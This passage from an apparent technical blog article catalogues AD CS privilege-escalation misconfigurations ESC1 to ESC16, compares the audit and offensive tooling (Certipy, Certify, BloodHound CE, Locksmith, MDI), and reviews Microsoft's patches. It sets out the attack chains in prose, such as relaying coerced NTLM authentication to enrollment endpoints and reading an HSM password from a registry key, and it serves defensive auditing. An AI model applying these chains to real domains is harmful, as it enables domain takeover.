Get-ADObject -SearchBase &quot;CN=Certificate Templates,CN=Public Key Services,CN=Services,$((Get-ADRootDSE).configurationNamingContext)&quot; -Filter * -Properties msPKI-Certificate-Name-Flag, pKIExtendedKeyUsage, msPKI-Enrollment-Flag |
  Where-Object {
    ($_.&apos;msPKI-Certificate-Name-Flag&apos; -band 0x1) -ne 0 -and
    ($_.&apos;msPKI-Enrollment-Flag&apos; -band 0x2) -eq 0 -and
    ($_.pKIExtendedKeyUsage -contains &apos;1.3.6.1.5.5.7.3.2&apos;)
  } | Select-Object Name
```
The query lists templates with ESS set, no manager approval, and Client Authentication EKU. Locksmith, PSPKIAudit, and Certipy all run a logically equivalent check; this is the smallest reproducible form for an audit script that does not depend on a vendor tool.
&lt;p&gt;&lt;strong&gt;ESC2 -- Any-Purpose or Subordinate CA EKU.&lt;/strong&gt; A template that grants the Any-Purpose EKU (&lt;code&gt;2.5.29.37.0&lt;/code&gt;) or the Subordinate CA EKU permits the certificate to be used for arbitrary purposes, including subordinate CA work. The attacker enrolls and then forges new certificates against the issued certificate&apos;s keypair. First disclosed by SpecterOps, June 2021 [@cpo-blog]. No BloodHound CE edge; the abuse pattern lives in Certify and Certipy [@certipy-wiki-priv].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ESC3 -- Enrollment Agent Template.&lt;/strong&gt; A template with the &lt;em&gt;Certificate Request Agent&lt;/em&gt; EKU lets the holder enroll certificates &lt;em&gt;on behalf of other users&lt;/em&gt;. Combined with a second template flagged &quot;Enrollment Agent&quot; the attacker can request a certificate naming any principal. The chain is two requests rather than one. SpecterOps, June 2021 [@cpo-blog]. BloodHound CE edge: &lt;code&gt;ADCSESC3&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;Access-control vulnerabilities: ESC4, ESC5, ESC7&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;ESC4 -- Vulnerable Certificate Template ACL.&lt;/strong&gt; Any principal with &lt;code&gt;GenericAll&lt;/code&gt;, &lt;code&gt;GenericWrite&lt;/code&gt;, &lt;code&gt;WriteOwner&lt;/code&gt;, or &lt;code&gt;WriteDacl&lt;/code&gt; on a template can modify the template into an ESC1-shaped configuration and then enroll. This converts a write right on a template object into Domain Admin. SpecterOps, June 2021 [@cpo-blog]. BloodHound CE edge: &lt;code&gt;ADCSESC4&lt;/code&gt;.The ADCSESC4 edge composes with BloodHound&apos;s general DACL graph, so a &lt;code&gt;Domain Users&lt;/code&gt; principal that holds &lt;code&gt;WriteDacl&lt;/code&gt; on a sensitive template inherits the path automatically without a hand-written query. The edge composes naturally with the rest of BloodHound&apos;s principal-DACL graph -- a &lt;code&gt;Domain Users&lt;/code&gt; principal with &lt;code&gt;WriteDacl&lt;/code&gt; on the template inherits the path.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ESC5 -- Vulnerable PKI Object ACL.&lt;/strong&gt; The same class of write rights on the CA computer object, the &lt;code&gt;NTAuthCertificates&lt;/code&gt; container, or the AIA container. Compromising any of these gates the entire AD CS substrate. SpecterOps, June 2021 [@cpo-blog]. No BloodHound CE edge today; the surface is wide and the operator chain depends on the specific object compromised.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ESC7 -- Vulnerable CA ACL.&lt;/strong&gt; A principal with the &lt;em&gt;Manage CA&lt;/em&gt; right on the Enterprise CA can edit its registry-controlled configuration (including the &lt;code&gt;EDITF_ATTRIBUTESUBJECTALTNAME2&lt;/code&gt; flag, which converts the CA into a global ESC6 condition). A principal with &lt;em&gt;Issue and Manage Certificates&lt;/em&gt; can approve their own otherwise-blocked certificate requests. SpecterOps, June 2021 [@cpo-blog]. No BloodHound CE edge; the abuse is a CA-side write rather than an AD principal-graph relationship.&lt;/p&gt;
&lt;h3&gt;CA configuration issues: ESC6, ESC8, ESC11&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;ESC6 -- &lt;code&gt;EDITF_ATTRIBUTESUBJECTALTNAME2&lt;/code&gt; on the CA.&lt;/strong&gt; When this CA-wide flag is set, &lt;em&gt;every&lt;/em&gt; certificate request can specify an arbitrary Subject Alternative Name regardless of the template&apos;s Name-Flag bits. The CA becomes globally ESC1-shaped against any template the attacker can enroll into. SpecterOps, June 2021 [@cpo-blog]. BloodHound CE edges: &lt;code&gt;ADCSESC6a&lt;/code&gt; and &lt;code&gt;ADCSESC6b&lt;/code&gt; (the latter for cases where the CA also disables the SID extension).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ESC8 -- NTLM Relay to AD CS HTTP Web Enrollment.&lt;/strong&gt; The AD CS Web Enrollment role service ships with NTLM authentication enabled and, by default, no Extended Protection for Authentication. An attacker who can coerce a target computer to authenticate (PetitPotam, PrinterBug, DFSCoerce) can relay that authentication to the CA&apos;s &lt;code&gt;/certsrv/&lt;/code&gt; endpoint, request a certificate naming the relayed principal, and walk away with a certificate impersonating the coerced computer -- including Domain Controllers. SpecterOps, June 2021 [@cpo-blog]. BloodHound CE graphs this as the &lt;code&gt;CoerceAndRelayNTLMToADCS&lt;/code&gt; edge [@bh-coerce-adcs-edge]: a Group-to-Computer edge whose source is &lt;code&gt;Authenticated Users&lt;/code&gt; and whose destination is the coerced target computer, with the edge&apos;s evaluation conditioned on at least one ESC8-vulnerable Web Enrollment endpoint being reachable on the network.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; ESC8 needs no template misconfiguration. It needs a CA with HTTP Web Enrollment role service installed -- common in environments that ever provisioned smart cards or did web-based renewal -- and at least one computer account the attacker can coerce. Microsoft mitigated it with KB5005413 in July 2021 [@kb5005413], but the mitigation is configuration guidance (EPA on, &quot;Require SSL&quot; on, Web Enrollment disabled if unused), not a binary patch. Environments that never enabled EPA on /certsrv/ remain exploitable today. The &quot;Domain Users to Domain Admin in eight minutes&quot; demos that pepper conference talks are usually ESC8 demos.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;ESC11 -- NTLM Relay to ICPR/RPC.&lt;/strong&gt; The ICertPassage RPC interface (the default enrollment transport on every Enterprise CA) enforces packet privacy when the &lt;code&gt;IF_ENFORCEENCRYPTICERTREQUEST&lt;/code&gt; flag is set; that flag has been on by default since Windows Server 2012. However, because the flag breaks certificate enrollment for legacy Windows XP clients, Compass Security observed real-world environments where administrators had explicitly &lt;em&gt;removed&lt;/em&gt; the flag for compatibility, leaving the RPC enrollment surface unencrypted. When packet privacy is not enforced, an attacker can relay a coerced NTLM authentication into the CA&apos;s RPC interface and obtain a certificate impersonating the coerced principal. Disclosed by Sylvain Heiniger at Compass Security, November 2022 [@compass-esc11]. The SpecterOps Certify documentation describes the misconfiguration as &quot;an insufficiently protected certificate authority RPC interface&quot; [@specterops-esc11-docs]. No BloodHound CE edge; the RPC transport is below the principal-graph model.&lt;/p&gt;
&lt;h3&gt;Certificate mapping issues: ESC9, ESC10, ESC13, ESC14, ESC15, ESC16&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;ESC9 -- No Security Extension.&lt;/strong&gt; A template flagged &lt;code&gt;CT_FLAG_NO_SECURITY_EXTENSION&lt;/code&gt; instructs the CA to issue certificates &lt;em&gt;without&lt;/em&gt; the &lt;code&gt;szOID_NTDS_CA_SECURITY_EXT&lt;/code&gt; SID embedding. KB5014754&apos;s strong-mapping enforcement then falls back to weak UPN mapping, and the attacker can rename a controlled user account to match a privileged user&apos;s UPN, enroll, and authenticate as that privileged user. Disclosed by Oliver Lyak at IFCR on August 4, 2022, twelve weeks after KB5014754 [@lyak-certipy-4-archive]. BloodHound CE edges: &lt;code&gt;ADCSESC9a&lt;/code&gt; and &lt;code&gt;ADCSESC9b&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ESC10 -- Weak Certificate Mapping.&lt;/strong&gt; The registry values &lt;code&gt;StrongCertificateBindingEnforcement&lt;/code&gt; (on KDCs) and &lt;code&gt;CertificateMappingMethods&lt;/code&gt; (on Schannel servers) control whether weak mappings are accepted. In Compatibility mode (the KB5014754 staged-rollout default through February 11, 2025), weak mappings still pass. An attacker who can write &lt;code&gt;altSecurityIdentities&lt;/code&gt; on a target, or who can engineer a weak UPN match, authenticates as the target. Same disclosure: Lyak, August 4, 2022 [@lyak-certipy-4-archive]. BloodHound CE edges: &lt;code&gt;ADCSESC10a&lt;/code&gt; and &lt;code&gt;ADCSESC10b&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ESC13 -- Issuance Policy linked to AD Group via msDS-OIDToGroupLink.&lt;/strong&gt; Active Directory issuance-policy OIDs can be linked to a security group via the &lt;code&gt;msDS-OIDToGroupLink&lt;/code&gt; attribute. When a certificate carries that issuance-policy OID, the issued PAC includes the linked group. A template configured with such an issuance policy effectively grants its enrollees membership in the linked group at authentication time. Disclosed by Jonas Bülow Knudsen at SpecterOps on February 14, 2024; discovery credit goes to Adam Burford, who brought the technique to Knudsen and Stephen Hinck [@knudsen-esc13]. BloodHound CE edge: &lt;code&gt;ADCSESC13&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ESC14 -- Explicit altSecurityIdentities Write.&lt;/strong&gt; A principal with write access to a privileged user&apos;s &lt;code&gt;altSecurityIdentities&lt;/code&gt; attribute can add their own certificate&apos;s X.509 expression to that attribute, then authenticate as the privileged user. The prior art goes back to Géraud de Drouas in 2019 [@dedrouas-altsec] and Jean Marsault at Wavestone in June 2021 [@marsault-wavestone]; Knudsen catalogued it as ESC14 in February 2024 [@knudsen-esc14]. No BloodHound CE edge today; the abuse traces through a write right on a single AD attribute and is in scope for future BloodHound coverage.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ESC15 -- V1 Template Application Policies Override (EKUwu).&lt;/strong&gt; The pre-installed V1 &lt;code&gt;WebServer&lt;/code&gt; template -- which ships on every CA, cannot be deleted, and is enrollable by &lt;code&gt;Authenticated Users&lt;/code&gt; by default -- accepts &lt;code&gt;Application Policies&lt;/code&gt; extensions in the request. Application Policies, a Microsoft extension parallel to standard EKU, are honored by the KDC. An attacker submits a CSR adding the Client Authentication Application Policy to a WebServer certificate, gets it signed, and authenticates as the requester. Disclosed by Justin Bollinger at TrustedSec on October 8, 2024 [@bollinger-ekuwu]. Microsoft assigned CVE-2024-49019 and patched it on November 12, 2024 [@cve-2024-49019-msrc]. No BloodHound CE edge.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ESC16 -- CA-wide SID Extension Disabled.&lt;/strong&gt; The CA&apos;s &lt;code&gt;DisableExtensionList&lt;/code&gt; registry value can list OIDs the CA will &lt;em&gt;omit&lt;/em&gt; from issued certificates. If &lt;code&gt;szOID_NTDS_CA_SECURITY_EXT&lt;/code&gt; (1.3.6.1.4.1.311.25.2) is on that list, the CA stops embedding the SID extension globally, and the strong-mapping enforcement of KB5014754 collapses into weak mapping for every certificate the CA issues. The SpecterOps Certify documentation records the punchline: &quot;The configuration was first described in 2022 by Will Schroeder in this blogpost as a temporary workaround for the interaction between ESC7 and ESC6, but was later tagged ESC16 by Oliver Lyak&quot; [@specterops-esc16-docs]. No BloodHound CE edge.&lt;/p&gt;

ESC12 lives in a different primitive category from every other ESC: it attacks the CA&apos;s HSM, not its software configuration. Hans-Joachim Knobloch&apos;s October 2023 disclosure (earliest Wayback snapshot dated October 24, 2023) observes that the YubiHSM2 Key Storage Provider on AD CS stores the HSM authentication key in cleartext under `HKEY_LOCAL_MACHINE\SOFTWARE\Yubico\YubiHSM\AuthKeysetPassword` [@knobloch-esc12] [@knobloch-esc12-archive]. A non-administrative user with shell access to the CA and read on that registry key can recover the HSM password and forge certificates against the HSM-backed CA key. Out of body scope for this article; readers running YubiHSM-backed CAs should read Knobloch&apos;s primary source.
&lt;p&gt;By the time you reach ESC10 here, a pattern is visible without anyone naming it: every Microsoft mitigation in this class is followed by a new ESC that side-steps it. KB5005413 closes ESC8 over HTTPS; ESC11 routes around it via RPC. KB5014754 closes ESC9 and ESC10 under Full Enforcement; ESC16 disables the underlying SID extension. CVE-2024-49019 closes ESC15 on V1 templates; the V1 templates themselves remain on every CA. The catalog grows faster than the patches.&lt;/p&gt;
&lt;p&gt;Of the sixteen entries above, BloodHound CE ships eleven principal-graph edges covering eight distinct ESCs: &lt;code&gt;ADCSESC1&lt;/code&gt;, &lt;code&gt;ADCSESC3&lt;/code&gt;, &lt;code&gt;ADCSESC4&lt;/code&gt;, &lt;code&gt;ADCSESC6a/b&lt;/code&gt;, &lt;code&gt;ADCSESC9a/b&lt;/code&gt;, &lt;code&gt;ADCSESC10a/b&lt;/code&gt;, &lt;code&gt;ADCSESC13&lt;/code&gt;, plus the &lt;code&gt;CoerceAndRelayNTLMToADCS&lt;/code&gt; edge that graphs ESC8 [@bh-llms]. The remaining eight ESCs (ESC2, ESC5, ESC7, ESC11, ESC12, ESC14, ESC15, ESC16) are out of edge coverage today -- some because their primitive lives below the principal graph (ESC11&apos;s RPC transport), some because their abuse is a CA-side write rather than a domain principal relationship (ESC7, ESC5), and some because they are too new to have been edge-modeled (ESC14, ESC15, ESC16). The gap is structural and operationally significant; section eight explores why.&lt;/p&gt;

flowchart TD
    subgraph TEMPLATE[Template]
        E1[ESC1 ESS+ClientAuth+LowPriv&lt;br /&gt;SpecterOps 2021]
        E2[ESC2 AnyPurpose/SubCA&lt;br /&gt;SpecterOps 2021]
        E3[ESC3 Enrollment Agent&lt;br /&gt;SpecterOps 2021]
        E15[ESC15 V1 AppPolicy&lt;br /&gt;TrustedSec 2024]
    end
    subgraph ACL[Access Control]
        E4[ESC4 Template DACL&lt;br /&gt;SpecterOps 2021]
        E5[ESC5 PKI Object DACL&lt;br /&gt;SpecterOps 2021]
        E7[ESC7 CA DACL&lt;br /&gt;SpecterOps 2021]
    end
    subgraph CA[CA Configuration]
        E6[ESC6 EDITF SAN2&lt;br /&gt;SpecterOps 2021]
        E16[ESC16 Disable SID Ext&lt;br /&gt;tagged Lyak 2025]
    end
    subgraph TRANSPORT[Transport]
        E8[ESC8 Relay to HTTP&lt;br /&gt;SpecterOps 2021]
        E11[ESC11 Relay to RPC&lt;br /&gt;Compass 2022]
    end
    subgraph MAP[Mapping]
        E9[ESC9 No SID Ext&lt;br /&gt;IFCR 2022]
        E10[ESC10 Weak Mapping&lt;br /&gt;IFCR 2022]
        E13[ESC13 OIDToGroupLink&lt;br /&gt;SpecterOps 2024]
        E14[ESC14 altSecurityIdentities&lt;br /&gt;SpecterOps 2024]
    end
    subgraph HW[Hardware]
        E12[ESC12 YubiHSM Substrate&lt;br /&gt;Knobloch 2023]
    end
&lt;p&gt;The static rules that Certipy, Certify, Locksmith, and PSPKIAudit all run to decide whether a template is ESC1-shaped are simpler than the catalog above might suggest. Three boolean inputs, three conjunctive conditions, one output label.&lt;/p&gt;
&lt;p&gt;{`
function classifyTemplate(t) {
  const ess = t.flags.includes(&apos;CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT&apos;);
  const clientAuth = t.eku.includes(&apos;1.3.6.1.5.5.7.3.2&apos;);
  const lowPriv = t.enroll.some(p =&amp;gt; [&apos;Authenticated Users&apos;, &apos;Domain Users&apos;].includes(p));
  const noApproval = !t.flags.includes(&apos;CT_FLAG_PEND_ALL_REQUESTS&apos;);
  if (ess &amp;amp;&amp;amp; clientAuth &amp;amp;&amp;amp; lowPriv &amp;amp;&amp;amp; noApproval) return &apos;ESC1&apos;;
  return &apos;safe-for-now&apos;;
}&lt;/p&gt;
&lt;p&gt;const wifi = {
  flags: [&apos;CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT&apos;],
  eku:   [&apos;1.3.6.1.5.5.7.3.2&apos;],
  enroll:[&apos;Authenticated Users&apos;]
};
console.log(classifyTemplate(wifi));
`}&lt;/p&gt;
&lt;h2&gt;6. The 2026 Toolchain&lt;/h2&gt;
&lt;p&gt;Sixteen ESCs is too many for one tool. The 2026 state of the art is a stack: defenders run Locksmith, PSPKIAudit, BloodHound CE, and Microsoft Defender for Identity in parallel; offense runs Certipy and Certify. No single tool covers every ESC, prioritizes its findings, &lt;em&gt;and&lt;/em&gt; produces forensic primitives for response. Coverage gaps are structural, not accidental.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Certify&lt;/strong&gt; is the original offense-side tool from the SpecterOps team that wrote &lt;em&gt;Certified Pre-Owned&lt;/em&gt;. A C# Windows binary that enumerates and abuses AD CS misconfigurations using the operator&apos;s in-process credentials [@certify-gh]. Released at Black Hat 2021, built against .NET 4.7.2. Certify covers the ESC1 through ESC16 enumeration surface via its documentation pages [@specterops-certify-docs-index]; abuse implementations exist for the catalog&apos;s most operator-friendly entries, with ESC11 documented as enumeration-only at the most recent docs revision [@specterops-esc11-docs].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Certipy&lt;/strong&gt; is the Linux-side sibling, written in Python by Oliver Lyak at IFCR (now an independent project) [@certipy-gh]. The README carries the strongest coverage claim in the tool community: &quot;full support for identifying and exploiting all known ESC1-ESC16 attack paths.&quot; Certipy ships its own NTLM relay (&lt;code&gt;certipy relay&lt;/code&gt;), embedded BloodHound output, certificate forging, and PKINIT-to-TGT exchange. The Certipy wiki&apos;s privilege-escalation page is the best walking reference for the entire catalog [@certipy-wiki-priv].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;BloodHound Community Edition&lt;/strong&gt; is the only tool in the stack that integrates AD CS findings into the broader Active Directory attack graph. SharpHound CE collects AD CS objects -- CAs, templates, NTAuth membership, per-template DACLs -- and the BloodHound server computes ten &lt;code&gt;ADCSESC*N*&lt;/code&gt; edges (ESC1, ESC3, ESC4, ESC6a/b, ESC9a/b, ESC10a/b, ESC13) plus the &lt;code&gt;CoerceAndRelayNTLMToADCS&lt;/code&gt; edge that graphs ESC8 via coercion [@bh-llms]. BloodHound CE 7.x added Privilege Zones, which let defenders tag NTAuth CAs and their templates as Tier-Zero objects and surface paths to them in the analysis UI.&lt;/p&gt;

The principal-graph model treats each AD object as a node and each access right or trust as an edge. The graph then path-finds from a starting principal to a Tier-Zero target. This model works elegantly for template DACLs (ESC4) and CA DACLs (ESC7) and for issuance-policy group linkage (ESC13). It struggles with attacks where the abuse is a transport-level interaction rather than a principal-to-principal relationship.&lt;p&gt;ESC8 used to be considered uncatchable in this model. The &lt;code&gt;CoerceAndRelayNTLMToADCS&lt;/code&gt; edge solved that: BloodHound CE now models the SMB-coercion-plus-NTLM-relay-to-ESC8 chain as a Group-to-Computer edge whose source is &lt;code&gt;Authenticated Users&lt;/code&gt; and whose destination is the coerced target computer; the relay target CA and the template are encoded in the edge&apos;s metadata, not as graph nodes [@bh-coerce-adcs-edge]. The edge exists because coercion has a stable shape -- an unauthenticated principal class, a target computer, and an ESC8-vulnerable CA endpoint reachable on the network -- that the graph can express.&lt;/p&gt;
&lt;p&gt;ESC11 remains harder. The RPC enrollment transport does not have a stable coercion model (the trigger is &lt;code&gt;ICertPassage&lt;/code&gt; packet privacy not being enforced, not a coercion gadget like &lt;code&gt;MS-EFSR&lt;/code&gt;), and the BloodHound graph today does not ship an &lt;code&gt;ADCSESC11&lt;/code&gt; edge. The model limit is partial, not total. The conventional &quot;BloodHound cannot graph transport attacks&quot; framing -- which was the prevailing folklore through 2024 -- is wrong; ESC8 is in the graph. ESC11 is the open structural case.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Locksmith&lt;/strong&gt; is a PowerShell defender tool by Jake Hildreth (with Spencer Alessi) [@locksmith-gh]. It runs locally on a domain-joined host and reports template, CA, and NTAuth-container findings against the catalog. Modes 0 through 4: identify-and-report, auto-remediate where safe, produce a CSV, and so on. The lowest-friction defender tool in the stack -- a single &lt;code&gt;Invoke-Locksmith&lt;/code&gt; cmdlet returns a triage list against the published ESC range.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;PSPKIAudit&lt;/strong&gt; is the SpecterOps team&apos;s own defender baseline, built on top of PKI Solutions&apos; PSPKI module [@pspkiaudit-gh]. Its &lt;code&gt;Invoke-PKIAudit&lt;/code&gt; and &lt;code&gt;Get-CertRequest&lt;/code&gt; cmdlets cover ESC1 through ESC8 plus the &quot;Explicit Mappings&quot; surface for ESC14. The README is marked beta; PSPKIAudit predates Locksmith and ships fewer remediation primitives, but it is the canonical reference for what the original SpecterOps team thinks the defensive audit should do.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Microsoft Defender for Identity&lt;/strong&gt; ships the ADCS posture assessment suite when the MDI sensor is installed on the CA itself [@mdi-certs]. The current product surface assesses nine ESCs by name: ESC1 (Preview), ESC2, ESC3, ESC4 (split across two separate assessments -- template owner and template ACL), ESC6 (Preview), ESC7, ESC8, ESC11, and ESC15. The product page is explicit: &quot;This assessment is available only to customers who have installed a sensor on an AD CS server.&quot; MDI&apos;s coverage is &lt;em&gt;broad and operationally integrated&lt;/em&gt; -- the same SOC console that surfaces Pass-the-Hash detections now surfaces the largest named-ESC posture-assessment suite of any non-Certipy tool in the stack, with the ESC1 and ESC6 assessments shipped in Preview state.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The KB5014754 strong-mapping track&lt;/strong&gt; is Microsoft&apos;s runtime mitigation rather than a tool, but operationally it belongs in the stack discussion because it is the largest single thing Microsoft has shipped for this class [@kb5014754]. Strong mapping closes ESC9 and ESC10 (plus Certifried CVE-2022-26923) under Full Enforcement, defaults to Compatibility through February 11, 2025, and removes the legacy-mapping registry override on September 9, 2025. Operationally this is a deployment decision more than a &quot;tool to run&quot;, but every defender stack has to plan for it; the Microsoft Tech Community Intune blog is the cross-reference for environments using SCEP or PKCS [@ms-tc-intune].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The Hacker Recipes AD CS chapter&lt;/strong&gt; is a community reference catalog rather than a runnable tool; it serves as the canonical operator-facing summary of every ESC and is worth bookmarking. (Network reachability of the canonical URL has been inconsistent in late 2025 / 2026.)&lt;/p&gt;
&lt;p&gt;Here is a single-table comparison of the practical stack. The right answer for a real enterprise is roughly &quot;all of them in parallel&quot;; the table makes the coverage gaps explicit.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool / track&lt;/th&gt;
&lt;th&gt;Language&lt;/th&gt;
&lt;th&gt;ESC enumeration coverage&lt;/th&gt;
&lt;th&gt;Abuse capable&lt;/th&gt;
&lt;th&gt;Graph capable&lt;/th&gt;
&lt;th&gt;Best deployed for&lt;/th&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Certify&lt;/td&gt;
&lt;td&gt;C# (Windows)&lt;/td&gt;
&lt;td&gt;ESC1 to ESC16 (per docs)&lt;/td&gt;
&lt;td&gt;Yes (most)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Operator chains, Windows offense&lt;/td&gt;
&lt;td&gt;[@certify-gh]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Certipy&lt;/td&gt;
&lt;td&gt;Python (Linux)&lt;/td&gt;
&lt;td&gt;ESC1 to ESC16 (README claim)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Embedded&lt;/td&gt;
&lt;td&gt;Operator chains, Linux offense&lt;/td&gt;
&lt;td&gt;[@certipy-gh]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;BloodHound CE ADCS edges&lt;/td&gt;
&lt;td&gt;Cypher&lt;/td&gt;
&lt;td&gt;8 of 16 ESCs (11 edges: ten ADCSESC&lt;em&gt;N&lt;/em&gt; + CoerceAndRelayNTLMToADCS)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Prioritization, attack-path analysis&lt;/td&gt;
&lt;td&gt;[@bh-llms]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Locksmith&lt;/td&gt;
&lt;td&gt;PowerShell&lt;/td&gt;
&lt;td&gt;Published ESC catalog&lt;/td&gt;
&lt;td&gt;Identify and fix&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Operational scans on each CA&lt;/td&gt;
&lt;td&gt;[@locksmith-gh]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PSPKIAudit&lt;/td&gt;
&lt;td&gt;PowerShell&lt;/td&gt;
&lt;td&gt;ESC1 to ESC8 plus Explicit Mappings&lt;/td&gt;
&lt;td&gt;No (read-only)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Defender baseline, audit&lt;/td&gt;
&lt;td&gt;[@pspkiaudit-gh]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MDI ADCS posture&lt;/td&gt;
&lt;td&gt;SaaS&lt;/td&gt;
&lt;td&gt;ESC1 (Preview), ESC2, ESC3, ESC4, ESC6 (Preview), ESC7, ESC8, ESC11, ESC15&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Inside MDI console&lt;/td&gt;
&lt;td&gt;SOC integration, posture scoring&lt;/td&gt;
&lt;td&gt;[@mdi-certs]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;KB5014754 strong mapping&lt;/td&gt;
&lt;td&gt;Windows runtime&lt;/td&gt;
&lt;td&gt;ESC9, ESC10, Certifried (mitigation)&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;n/a&lt;/td&gt;
&lt;td&gt;Domain Controllers (deploy)&lt;/td&gt;
&lt;td&gt;[@kb5014754]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; For most enterprises the realistic configuration is: Locksmith scheduled monthly on every CA; BloodHound CE with the ADCS collector enabled in SharpHound CE; Microsoft Defender for Identity sensor on every AD CS server (for the nine-ESC SOC visibility surface that now includes ESC1 and ESC6 in Preview); PSPKIAudit run once a quarter as the SpecterOps-blessed baseline; Certipy in the red-team or purple-team kit; and the KB5014754 rollout staged to land at Full Enforcement before February 11, 2025 (legacy-mapping removal September 9, 2025). The remaining gap items -- ESC5, ESC12, ESC14, and ESC16 (neither in BloodHound&apos;s principal graph nor in MDI&apos;s posture-assessment surface) -- are caught by Locksmith plus PSPKIAudit plus Certipy plus careful template review.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If no single tool covers everything, what is Microsoft actually doing about it?&lt;/p&gt;
&lt;h2&gt;7. What Microsoft Has Actually Shipped&lt;/h2&gt;
&lt;p&gt;Of sixteen named ESCs, Microsoft has shipped three CVE-class patches. The rest are hardening guidance. The asymmetry is not accidental; it tracks the boundary Microsoft draws in its &lt;a href=&quot;https://paragmali.com/blog/windows-security-boundaries-the-document-that-decides-what-g/&quot; rel=&quot;noopener&quot;&gt;Windows Security Servicing Criteria&lt;/a&gt; between &lt;em&gt;default-state vulnerabilities&lt;/em&gt; (which receive CVEs and binary patches) and &lt;em&gt;admin-configurable misconfigurations&lt;/em&gt; (which receive documentation). Most ESCs sit on the configurable side of that boundary.&lt;/p&gt;
&lt;p&gt;Four Microsoft mitigation tracks define the response, in order of when they shipped.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;KB5005413 (late July 2021) -- NTLM Web Enrollment hardening.&lt;/strong&gt; Published roughly six weeks after &lt;em&gt;Certified Pre-Owned&lt;/em&gt; in response to PetitPotam plus the SpecterOps ESC8 disclosure [@kb5005413]. Recommends enabling Extended Protection for Authentication, requiring SSL on the &lt;code&gt;/certsrv/&lt;/code&gt; virtual directories of AD CS Web Enrollment and the Certificate Enrollment Web Service, and disabling NTLM where Kerberos is available. Crucially: KB5005413 is &lt;em&gt;guidance&lt;/em&gt;, not a binary patch. Environments that never enabled EPA on &lt;code&gt;/certsrv/&lt;/code&gt; remain exploitable today. The KB closes ESC8 over HTTPS when fully applied; it does not affect ESC11 (RPC), ESC1 through ESC7, or anything in the ESC9-plus range.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;CVE-2022-26923 (May 10, 2022) -- Certifried.&lt;/strong&gt; The single MSRC-acknowledged CVE in the original ESC1 through ESC8 design space [@cve-2022-26923-nvd] [@cve-2022-26923-msrc]. Disclosed by Oliver Lyak at IFCR [@lyak-certifried], the vulnerability lets any Authenticated User (because the default &lt;code&gt;ms-DS-MachineAccountQuota&lt;/code&gt; is 10 [@semperis-cve]) create a computer account, write its &lt;code&gt;dNSHostName&lt;/code&gt; to match a Domain Controller, request a certificate from the default Machine template, and PKINIT as the DC. Microsoft patched it on the May 10, 2022 Patch Tuesday. Semperis&apos;s retrospective documents the chain in detail [@semperis-cve]. The patch closes &lt;em&gt;that specific path&lt;/em&gt; -- the &lt;code&gt;dNSHostName&lt;/code&gt; impersonation race -- and is part of the same Patch Tuesday that shipped KB5014754. It does not close any other ESC.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;KB5014754 (May 10, 2022 -- present) -- the strong-mapping rollout.&lt;/strong&gt; The largest single Microsoft mitigation in the entire class [@kb5014754]. SpecterOps&apos;s own analysis -- &quot;Certificates and Pwnage and Patches, Oh My!&quot; -- remains the canonical walkthrough of how the new behavior interacts with the existing catalog [@specterops-pwnage].&lt;/p&gt;
